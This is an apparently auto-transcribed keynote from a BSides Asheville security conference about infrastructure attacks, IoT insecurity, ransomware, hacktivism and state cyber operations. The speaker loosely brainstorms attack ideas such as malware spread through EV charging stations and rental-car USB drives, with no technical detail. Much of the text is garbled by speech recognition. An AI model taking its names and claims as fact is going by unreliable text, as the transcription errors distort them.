4th Annual Bsides Asheville Keynote - John Bumgarner

how to destroy parts of the electrical grid water systems airlines and things we were doing things like trying to figure out how to bankrupt the airline is we were trying to figure out how to destroy generators one of the projects I got to work on was on centrifuges for a while and so will you grow stuff there you go I don't mind it does say that but that's not true I just had fortunate the safe about Stuxnet in a paper if you've read a paper actually wrote this that attack out in a paper and published it and the Stuxnet followed the same attack so but so critical in structure anywhere and this is a huge problem around the world

back in the early 90s I was working at the Pentagon and one of my friends once worked out coined the phrase a digital fertile Arbor and that was a long time ago I'm late and it came down now the last one to say it was Leon Panetta the former director for the CIA and it became a thing we still haven't had a digital recorder attacking the critical infrastructures isn't easy I mean Stuxnet took multiple years and try to write and get correct and it still has some flaws and that's not us found because of law the issue is all heard important structures not the same so if you try to attack a legend grid somewhere you may cause a little blip

and you're less brittle but if you had the time and effort to do it you could identify key nodes an electrical grid or water systems and causes a major problem so you have to do a lot of research right so pretty much everything out there today is connected and it's a it's a major thing the shipping frames right here I did a project or shipping cranes and one of the things with the shipping crates these shipping crates normally come from South Korea the normal to take five years or better to get these cranes built and shipped these things are clocked computerized and you can actually cause these things to wreck into the side of a ship

if you do a right attack you can cause the swing to [ __ ] and cause damage on the ship and create problems an automation we know about automation Internet of Things anyone ever ever used x10 back in the day x10 people so X can not when I when I had my house in Charlotte I had extended their and this is before the Internet of Things concept an x10 you could you know suit up your bed and turn the lights on and turn your lights off and everything else well one of the projects that I did my house was to take one of those off and put on isolated area and try to run make

it cycle faster and you know what happened to his site was too fast and mechanical really kids aspiring food so so this is the big thing without back then people didn't think about that but now we got these innovative things you know like when I was in Charlotte I mean I had my mice we're connected my thermostats were connected my my you know TV I had private television channels in my house I had 66 percent of my utilities were connected to the Internet so I had a smart meter outside the smart water heater and so everything was potentially tackled and like one of my friends about the Internet of Things he had this high-tech bread machine one time it you

know that was connected to the Internet and he couldn't program sup and I was able just to walk up to his Internet of Things device and hit by design and you know the wrong sequence and crashed it and broke it right break this bread machine so each year there's gonna be so many things that are in here announcing you know like a washing machine you go down and found that they had Lowe's and you can buy a washing machine that will see me a message or closer though I mean I don't care if my closes I don't want to listen for it but you know do I need to worry about milk or something like

that so you start deploying things in your own house you have to worry about I mean I had a meal down here at a restaurant Nashville the other day and I pulled out my phone that said would you like to connect to the thermostat into the password thing what is the default password for this problem imagine sitting in a restaurant and turning up the airs but there's other things with internet things that you may not have talked about privacy's of big problem there and things is it then called a you know personal identifiable information and you can use that a great project one time called patterns of life and so if you take that data that's

coming off your internet of things you can actually build a pattern or life of a person and so if Biggers you collecting this data they know when you wash clothes and then when you turn your liquor when you walk by your thermostat when you all by Lester thermostat will come on some nests notice Google knows when you walk by the thermostat is your home right they can pick that up anytime you're doing some of these things and home of these internet things when you when you turn on your hue lights Phillips knows you know that you use that view device especially because you're using their app the future is already here we are in the Charlie this

actually from presentation I gave in Berlin five six years ago about the future was gonna have cars and you know Oh charlie and one of the guy recently did something for Jeep and hack the Jeep you break this to you a couple times you know take it in but the thing is when you start looking at some of these cars today well Charlie actually had to have physical access to the car to modify it it couldn't do it remotely so but in the future is gonna be possible to do some of this some of these attacks remotely I mean darn good and some other people and DHS are looking to improve cybersecurity cars but one of those

things that you know I haven't seen happen that which I would love to see happen is electrical cars is when you go to the electrical charging station and you plug your target I mean how many of you thought about you know putting malware inside the charging station because that's the computer that's connected to that car but that power net monitors that I would like to be able to pack into that that that that station put that stuff into the car and then assumed to be some malware there into the car right or how many of you thought when you go into Hertz to rent a car is take a USB and plug it into the

car to upload some songs in there but with some malware on there and next time the technician comes in there to plug in you you get from you get his C USB drive disinfected and goes into the fleet and then have something like called like a Charlie's type thing shut the car down on a certain day and I imagine how that would impact persons these are type of attacks that could occur how many credit customer revenues loss this is his I've had my credit card and the cyber security guy I had my credit card information stolen least two dozen times now and been involved in so many data breaches this is crazy and it fury

eights me every time I get a notice in the mail that I've been involved in data breach because first thing happened up is who failed in his job what cybersecurity guy what database administrator what developer and what QA person you know what manager who failed to do this target reach the target breached when they attacked the POS systems target did not was not using a detection system that would tell them that they had software being his father his POS systems administrator rights they could have had a simple programmer in not even a commercial program that could have written her own program and installer these systems and they could have alerted them when that software got

put on that system and if they would have known about you attacked that quick that's laziness that's what that is you don't have to buy a million dollar product to fix a simple problem locked out this is a big common place now the hospital right here and Ashlan mission was you know they had a couple months back they had a big after this is one of them in California they had a big attack here trying to get into hospital here you know it's a pretty simple attack someone breaks into your system they saw software they ripped your files and they ransom offer Bitcoin it became once this hospital paid and it became pretty common places hospitals are gonna pay I

mean how do you how do you get around this attack having backups ready yeah backups you get around this time I mean how do you have how would an attacker improve this attack damage corrupt you Baptist so it can stay for many months and crush your backups and then do it and it can make more money now one of the things I've done a lot over the years is I do a lot of research of these habitus groups and nation state attacks and drive look online you'll see you got to get a bunch of stuff on cyber warfare and these type of events so let's delete everything the first one that would really know about the Saudi Aramco right

Saudi Aramco here it used the commercial product that was freely available that you could download with a 30-day key and it was from a company in the UK the developer whoever it was downloaded it tweaked it tested it and with it only with this 30 day period in Washington and I got thirty thousand computers Saudi Aramco right he launched the attack on a major holiday right was a major holiday in Ramadan he longs to the attack on that holiday where everyone was off and everything appears so many people got fired for this incident right and the company that company is sold and commercial software actually made some modifications so you could no longer register we got a new

gmail Shetty's a corporate account to get a sovereign then a little bit to the voice here this is Sonny allegedly North Korea and this is allegedly Iran North Korea here as sunny that's what they used they use the same software but what trade micro that can be semantic and everyone else went out and made sure that that version software at least here could be using there but guess what there were 22 other versions at before this that worked that were freely available and then work so this hacker take the version that wasn't being blacklisted by Samantha for McAfee or trade and it used to hear their own race to confuse and when I wrote and spoke

with my friend and that wasn't chief information security officer trend I said I didn't go out and go get all these samples of the stuff and block it and he goes well we never thought about that my not you didn't think someone someone used with one person all the other 22 worked on so what did you block does but now we've got the problem now with ransomware and you know now we kind of know that they can use this commercial software products here but over here they're not using commercial software their use of they're leveraging stuff on their own systems now I mean most of us have a PowerShell running in our system we also have back running our

system ready basic Windows commands so these are like this will ears letter achieve PowerShell and this one they've got a new thing right now they just delete all your files and tell you to to buy it back they don't they don't exist they're erase them all and just put a message on your computer hate buy your files they're gone and send you information hey this is how you beat your files but they're not there so how many of you have even you know build something on your systems to see what power shows being used right you know even if it's administrator or not administrative so this stuff doesn't require narrator rights to the digital voice anonymous is originally and now

this was was about doing stuff and all straight and you know they one of the first things did one of the first operations to notice it did they did a thing where they sent out these monography photos of girls with small breasts right that was the first thing they did now this is actually moved to a whole nether realm and Anonymous itself is been co-opted by so many people and co-opted it means that people put themselves under this umbrella and say they're anonymous but they're not anonymous they're nation-state actors and other things you know it's these this operation here you know operation independence Ukraine you know goes back and forth are they Pro Ukrainian they're

pro-russian it all depends on what they play out with same with here this one's about this is an anti Russia and this was a very good swing this is all these are kind of degrading Ukraine this right here was very interesting is it was a grouping took place that in Crimea it was it was a hacker organization it came up online pretty quick it it set up a website it had all of these and correct themes and symbols and it was the one it was hacking these sites with Pro it was actually not some propaganda if you ever followed this Russia and Russia attacks the country they try to use Nazism to actually say these people are bad and

they use this over and over at home right so they fact they they hacked all these websites they're 200 some websites throughout the country and post throat propped it up there the bad thing is if you'd be working Incident Response thread and tell them is there any of these things before you fix your computer that's been hacked please collect intelligence collect something off of it so people can come back and figure out how it was hacked you know what kind of potentially the automated script because you know it had to be an automated script or 200 assistants you know in its right but when you try to collect any information about some of these packs no one had it because when

you talk to so many companies they just you know rebuild their systems and didn't collect anything for but so this was a very interesting thing here this was after a stone he was attacked in 2007 they stood up a native center called the CCDC ue which is kind of a think tank for NATO for cybersecurity and what happened here is this organization here which is electric pro-ukrainian it's really rushing this organization here launched a major not denial service attack against the CCE and Estonia because not only did that they also took out NATO's primary website right for 24 hours NATO was offline negatives primary web site was offline that couldn't get it up because whoever this group was which had a lot

of bandwidth was able to knock these guys out and the CCC we got this you know knocked offline and they had to move to cloud flare I mentioned that took like nine days to move all their stuff over which there was a standard web site but the thing here is interesting you know you have the bird of prey here and the snake and is kind of this opposition you know I'm going to eat you this is what the symbology is so hacktivism how many of you actually followed hack this one too so we all know about this year Syrian electronic army they had their a - a couple years back public tax that were notable was

like when they took the New York Times offline you were a country that had a way that though that their DNS was being co-op is new and why why was it then why was why was in Australia why wasn't play sells why they have better two factor authentication own it all these things it was crazy it happen and they took the New York Times offline from way to date I think it was heard of times like two days to do it the so here's the thing the Syrian electronic army they did that some disaster recovery stuff here is the New York Times could have use of IP addresses you know and have a secondary to fall back side with the secondary you

know domain they and tweeted stuff about here's our news stories and no plan it all fell apart from New York Times anon goes is an organization it always attacks Israel usually always in September level and always do these things operation is free bar the thing is you've done threat intelligence I do it occasionally these two groups are the same Bruce they registered their websites they're back in the back certainly is some of that you can find one or two data points that actually link these two groups together a small piece of data let me see two together they hit their the same group right here is another important together groups and we're doing analysis on this but this is

another half of this group allege hacker this group I mean this is a this photo right here's from the Punisher this scarf you're wearing right there it is a red shepherd scarf this is a symbol of Hamas and this symbol here actually says there is no god but Muhammad is the Messenger of God espionage isn't really new I mean we've been doing it for a while I've been banned from the DMV conference because I gave a lecture there how to book print and steal information from the from Lockheed Martin and I was banned from the conference room for life well you know they should have protected her so good they had after Lockheed Martin threatened assuming they decided they

were going to start a counterintelligence program so there was a good thing they started to counter tell this person that all information it was available was was free online I couldn't help with that found someone that was taking joint strike Joint Strike Fighter documents including on their iPod and mother Teresa Franklin's greatest hits and not stripping the metadata back out before they put it back into the network so that was the a little thing so there's a lot of stuff about this SP nice thing it's nothing new we got sabre-rattling which is another issue more curious nakedness that's one of the first attacks was on the July for many years ago North Korea knocked out the State Department and not

that the CIA it knocked out several major government agencies with a denial of service attack and most of those government agencies eventually left their service provider I think they want an alpha my now I don't know who they were before they left that service provider moved over and this has become a big issue because North Korea is leaning for a lot of stuff we come in peace my claim to fame is the Georgian attacked I did a lot of analysis from that and I got a classified paper of that this government so these this was the first military operation that we know about maybe cyber is a preparatory phase so it launched a cyber attack and

took out pieces of communication architecture that the president and others would communicate with their population about Russia starting across the board and that was the first time and the attacks lasted they started when the operation took off hours before it lasted all the way till they signed a peace accord and they stopped write the Russian military still has occupation in the South says yet which is unborn they took control up but you know how does how does allegedly hackers run an operation that starts right before a military operation and how do those hackers also stop right from the military operation ring with a piece of court because it doesn't happen right they also had like back to

forensics and threat intelligence we also had a digital imaging put online and this is what I'm seeing the men collect intelligence that digital image online and they used to do for propaganda and so I was able to trace that image back and find the original image in a repository online and that image was created was this attack occurred in 2008 and habitual - actually created in 2006 and another period of time that Russia and Ukraine were in turmoil it was already pre prepared for an operation that never got used so when you're collecting thomaswguy look at everything the Ovation here the same thing blackouts all the military took off their stuff we have all kinds of

similarities between here group stood up here is this as fast as this one root stood up and started doing cyber attacks like it was just talking about the interesting thing here who never Salutin always said that there was no Russian military there but there's a great video online that I found it was from France the shooting in Crimea and you steel framed it all the guys were wearing armbands and so they had some type of you know show of leadership and key thing they had they had a certain weapon is only is issued to Russian Spetsnaz forces carrying around the street so they should have not another weapons to not carry depressions that's not where

this so this is a big deal cyber warfare is a real a fantasy there's been any books written about this Richard Clark read the first one some of my other friends have written books about this is it real cyber warfare is real the question is will we ever have it what cyber warfare would be cyber will always be part of military operations in the future but it's pretty real because you know we talked about USB key strapped and it wasn't really a USB key I mean it's got near any nuclear program right it wasn't to see USB key I mean they had to actually attack and install Stuxnet in computer systems alter Iran and certain key facilities

and that software then is picked up by someone on a USB II is it his program that jumped to USD he can only lose 33 times and then once he moved three times to deleted itself so you wouldn't then so next way it hot okay so it started one places we've done a missionary you got something to the program to God but I mean also this week if you could be paying attention and this those key assassinations and all kinds of stuff that went up great minds if you ever looked at it remains shade charges they made this great shape charge that stuck on a vehicle and only blew up inside the vehicle and killing

the occupant is having no collateral damage outside professional cyber terrorism I've been writing about this three years now cyber terrorism is gonna happen eventually it's going to get to the point many years ago I was write a program a digital mousetrap program to catch insiders and I kind of sent her a problem with it and I posted her line to get someone to cranked it and it's back from Syria downloaded it corrected it made it much more efficient and and then I traced him back and he was sitting in this room and he had flags of like you know these terrorist organizations on his wall and his for blood sitting around thinking that's going to be the

future eventually those guys will become attackers and figure this out we could if someone wanted to we could co-op and have terrorism started cyber terrorism it would be very easy to do only thing it would have to do to get to this point is create an application that would be a denial service applique something else and asked where sirens you hide for people to use the application worldwide there are millions of people that donate their computers for this and it would be impossible to stop it is hasn't made it that neat because cyber terrorism doesn't sell like a suicide bomber or a guy and me and ik walking around it doesn't sell but the world is screwed great

I mean I've been in his business so many so many years and I constantly see that we have problems you know when I used to be a pen tester outgoing and we break in a place and I would have the CIO said you should have been able to break in because it's a million dollars on a product and you should have been David Guetta and say well why didn't you teach you developments and write better tell you why don't you have a better QA proctor process why didn't you have this and just look at me unlike those are the things you should spend your money on and this is what I've learned over the years where the problem you know we are

the problem it's not on I mean we we sometimes and I and I know guys that do this I mean I asked some developers to write some code I told them they you know prioritize SQL statements we need to make sure we even make sure we remove certain hidden files and all this stuff and the developers didn't listen and then Sony active and that's like you know why don't you take the time this and said it costs time what an interesting 10 15 20 minutes is going to cost in you want to get it out back 10 or 15 minutes kids need to a data breach right so we're the problem we have to figure out how to fix

ourselves and a lot of times when I go to corporations and there was one that's doing pin test and security assessments I always find the processes in that corporation are bad they don't have solid processes and development and other things networking architecture they don't have solid process now networking ought to share your blog manage by bringing those things and and some of those things are free really to come to build a process it takes time but once you get it built is kind of freak everything that you roll so the thing here you know how do we improve ourselves and this is one thing here you cannot see these words all right the light's still pink yeah so

here's the thing here is I I want to do this for my attacker viewpoint and it says instruments of battle or valuable only if you know how to use them that's true you have to know how to use the instruments the hackers are using and I hate use the word is really criminals they're using against you it's not really hackers they're criminal elements cyber criminals from Russia and Ukraine or Estonia China or someplace else that are using tissue and all these tools are normally freely available online that they're using me someone described the github and take CODIS parts go together and learn enhancement to so you need to take tools you know if you go out to box

me download directory buster right - let's see what kind of directors in your system you need to do that and learn that's what the attacker that's what the attacks come that we don't run director buster button from the vendors point of view the fence once we run the record buster and use that as an example we have to figure out the directors they're trying to get it - we need to remove directors do we need to harden our stuff if you see someone running director buster do we need to you know take their connections putting the tar pit what do we need to do we need to have an intrusion detection sister a citroen to

throw it off we have to have things written for this stuff and I think it's what and when I was in the Special Ops grants and intelligence branch one thing I used to teach people is you really have to think differently paint the phrase hate the phrase think outside the box right I hate it you don't mind it's too limited that is not the that is not what we need to do you only think outside the box you need to get another job really need to get another job really what you have to do is stuff you have to think outside the box you have to think inside the box you have to calm the box and you have to suit

it's no box at all you have to think from the problem from every angle there is and you cannot think that way you need to get another job if I get questions a little terrified how to use knew about you know misconceptions I think I think that the media treated some of the problems yeah because I mean like Daniel Daniel was trying to get something done before the actual citizens times and they wanted that they wanted a negative spin versus of poverty positive step so because the girl Daniel the reporter told Daniel that you know it leads it if it leads it you know if it bleeds it leads and that's really what it is when you

have a attack like that if it's if it's like that you know and it it crawls that attention right it's something like this I mean you talk you know for example year I was trying to rent an apartment here in Nashville and naughty Craigslist or an apartment here in Nashville you know who scams from Craigslist rascal tons and I approached the newspaper the newspaper Mountain Express and WOL Essen and said I wanted to talk you know this is a major problem you should alert people about the possibility scams and they they said we don't care about I'm like we maybe don't care about so we the issue they pick these stories that are the best for them they get the most

attention and some stories they don't go any other questions people stay actually activity starting to go and would know I mean it's like people said that when Stuxnet was found probably all operations stopped I doubted and China had just figured out another way to do it right I mean fire you may kick something just like counter-strike make housewife make hitch other things no one's going to catch everything and once you once you start catching one or two of these things and you start talking about it the Chinese are smart enough for write new code that it's around anything to fire I don't think they've all right they bought CrowdStrike services and you know the other services out there and

running against citizens I mean it's what most most most cyber criminals by every anti biotics piece of software to run against to see with this pot before they sell their wares out there they done this doodoo so China's change their parameters and looking at different things right now I would say that there's I would say there's still more the same type of attacks so you'd say that there is before the end one of the problems organizations is processes and it seems like relativity conferences a lot of process isn't employees three things the biggest contributor to that problem organization this their management management management a lot of it thinking that people just don't want to to admit the fact that

Security's hard and they're always looking for some magic magic application to take care of everything I think I think security is powdered but I don't think it's impossible yeah you know and I think that's where I think that's where we have a disconnect sometime so they build some management things impossible plus a lot of vendors come and I'm a vendor that I have a vendor on the vendor to sell vulnerability intelligence for people but you know just finding my vulnerability intolerance will make you more sal it'll more security but you still have to do the work with your side food problem so but concerning processes how many of you use like Isis standard yeah I so Stanley

so my other company is called the u.s. cyber consequence unit and back in 2007 we release the cyber security checklist and it went to become twice to become an international security standard it's free it's something a website and it's in semantics and some other companies put in their compliance tools it's a free checklist including an RSA this year my bit my business partner now at least in their checklist and that checklist out is totally you damned and that check was free it was funded by some organizations so for the research on it but that checklist you haven't looked at it it's a 176 pages long right it sounds a little along the way grip checklist is

it's written from two areas one is from the attacker perspective you're an attacker the other ones from the defender so when you go through this it goes through the whole lifecycle of security and supply chains and software development networking so I would recommend going out and looking at it and tell me how I breathe so it could help you with your businesses a lot of people who used it in common it's pretty good so any other questions tables cure me get off stage I'll tell you I lose a organizations that were doing a good job I don't know the organization is doing it perfect that's the issue CrowdStrike has their own way to talk fire has their

own way to talk eyesight Partners has their own way to talk threat stream they just download everything free for the internet and reach the package and sell it the I don't think anyone was doing it right immediate to in order to do some of this research it requires a lot of data it requires a lot of effort to do it right and a lot of brainpower it really does I mean just to analyze like you know small piece of thing to try to leave the Syrian electronic army with a knot goes or trying to link this group over here with Hamas just based on the symbology I used to work when I worked in intelligence movie I also worked in

deception operations and psychological operations so I learned how to look at things and symbols and stuff like that so he did something those pieces gather me it's not easy to leave all this data together I mean to find a piece of metadata that tie something together find the log file to tie something together it's not easy in these groups like CrowdStrike fire i eyesight partners there are in competition they don't they don't share their stuff I mean Daniel and I when I was going through the stuff of the apartment scams here I was trying to work with Daniel who works in a bank trying to work with him to go through the FSI sector and

report a cyber crime you know I eventually social engineer three bank accounts from this criminal tell him I couldn't use the bank account I couldn't do this he gets kept giving me new bank accounts over and over and over and we try to report him to Bank of America and son trust that was an impossible task to report stolen bank accounts at the Bank Council for being used for cybercrime it was just it was impossible no so any other questions Daniels say [Applause]